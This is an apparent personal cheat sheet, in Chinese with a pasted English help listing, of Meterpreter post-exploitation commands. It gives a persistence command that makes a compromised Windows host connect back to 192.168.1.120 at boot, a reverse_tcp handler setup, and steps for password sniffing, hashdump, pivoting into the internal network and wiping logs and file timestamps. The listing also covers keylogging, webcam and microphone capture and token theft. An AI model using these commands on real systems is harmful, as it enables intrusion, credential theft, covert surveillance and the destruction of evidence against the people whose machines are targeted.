meterpreter命令

[ meterpreter详解与渗透实战 ](http://blog.csdn.net/freestyle4568world/article/details/54712901)

基本命令：

background

quit

shell

irb

client.sys.config.sysinfo()

调用windows API：client.core.use("railgun")

弹出会话窗口：client.railgun.user32.MessageBoxA(0,"hello!world",NULL,MB_OK)

防止休眠：client.railgun.kernel32.SetThreadExcutionState("ES_CONTINUOUSE | ES_STSTEM_REQUIRED")

cat c:\boot.ini

目标当前目录：getwd

本地当前目录：getlwd

edit

upload

download

search

portfwd 端口转发

ipconfig

route

ps

migrate 将回话一直到另一个进程中

execute

getpid

kill

getuid

sysinfo

shutdown

后渗透攻击：

persistence模块：

run persistence -X -i 5 -p 443 -r 192.168.1.120

-X开机启动

-i反向链接间隔时间

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set ...

exploit

metsvc模块：

run metsvc

getgui模块：

run getdui -u metasploit -p metasploit

use sniffer 嗅探密码

sniffer_interface

sniffer_start 1

sniffer_dump 1 /tmp/xxx.cap

sniffer_stop 1

run windows/gather/smart_hashdump

hashdump

内网拓展：

run get_local_subnets

background

route print

销毁证据：

clearev 删除日志

timestomp 文件修改时间

---

Core Commands

Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
help                      Help menu
info                      Displays information about a Post module
irb                       Drop into irb scripting mode
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for 'load'
uuid                      Get the UUID for the current session
write                     Writes data to a channel

Stdapi: File system Commands

Command       Description
-------       -----------
cat           Read the contents of a file to the screen
cd            Change directory
checksum      Retrieve the checksum of a file
cp            Copy source to destination
dir           List files (alias for ls)
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
mv            Move source to destination
pwd           Print working directory
rm            Delete the specified file
rmdir         Remove directory
search        Search for files
show_mount    List all mount points/logical drives
upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description
-------       -----------
arp           Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat       Display the network connections
portfwd       Forward a local port to a remote service
resolve       Resolve a set of host names on the target
route         View and modify the routing table

Stdapi: System Commands

Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as
kill          Terminate a process
localtime     Displays the target system's local date and time
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command        Description
-------        -----------
enumdesktops   List all accessible desktops and window stations
getdesktop     Get the current meterpreter desktop
idletime       Returns the number of seconds the remote user has been idle
keyscan_dump   Dump the keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop   Stop capturing keystrokes
screenshot     Grab a screenshot of the interactive desktop
setdesktop     Change the meterpreters current desktop
uictl          Control some of the user interface components

Stdapi: Webcam Commands

Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam

Priv: Elevate Commands

Command       Description
-------       -----------
getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command       Description
-------       -----------
hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands

Command       Description
-------       -----------
timestomp     Manipulate file MACE attributes

Incognito Commands

Command              Description
-------              -----------
add_group_user       Attempt to add a user to a global group with all tokens
add_localgroup_user  Attempt to add a user to a local group with all tokens
add_user             Attempt to add a user with all tokens
impersonate_token    Impersonate specified token
list_tokens          List tokens available under current user context
snarf_hashes         Snarf challenge/response hashes for every token